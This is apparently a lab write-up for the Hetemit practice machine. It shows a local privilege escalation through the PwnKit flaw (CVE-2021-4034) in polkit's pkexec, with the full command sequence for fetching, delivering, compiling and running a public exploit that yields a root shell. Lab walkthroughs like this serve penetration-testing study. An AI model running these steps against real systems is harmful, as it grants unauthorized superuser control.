InfoSec LAB

Hetemit_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

PEAS has identified that the target system is vulnerable to CVE-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

Exploit

Exploit found online

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ git clone https://github.com/berdav/CVE-2021-4034 ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56 (from 1)
Receiving objects: 100% (92/92), 22.71 KiB | 894.00 KiB/s, done.
Resolving deltas: 100% (44/44), done.

Downloading & packaging the exploit

Exploitation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ scp -i ~/.ssh/id_ed25519 ./CVE-2021-4034.tar.gz cmeeks@$IP:/var/tmp/
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
CVE-2021-4034.tar.gz             100%   41KB 601.0KB/s   00:00

Delivery complete

[cmeeks@hetemit tmp]$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
[cmeeks@hetemit CVE-2021-4034]$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
[cmeeks@hetemit CVE-2021-4034]$ ./cve-2021-4034
cve-2021-4034     cve-2021-4034.sh  
[cmeeks@hetemit CVE-2021-4034]$ ./cve-2021-4034
sh-4.4# whoami
root
sh-4.4# hostname
hetemit
sh-4.4# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.218.117  netmask 255.255.255.0  broadcast 192.168.218.255
        ether 00:50:56:9e:bf:75  txqueuelen 1000  (Ethernet)
        RX packets 22380  bytes 3803877 (3.6 MiB)
        RX errors 0  dropped 183  overruns 0  frame 0
        TX packets 13701  bytes 3758799 (3.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 521  bytes 172389 (168.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 521  bytes 172389 (168.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks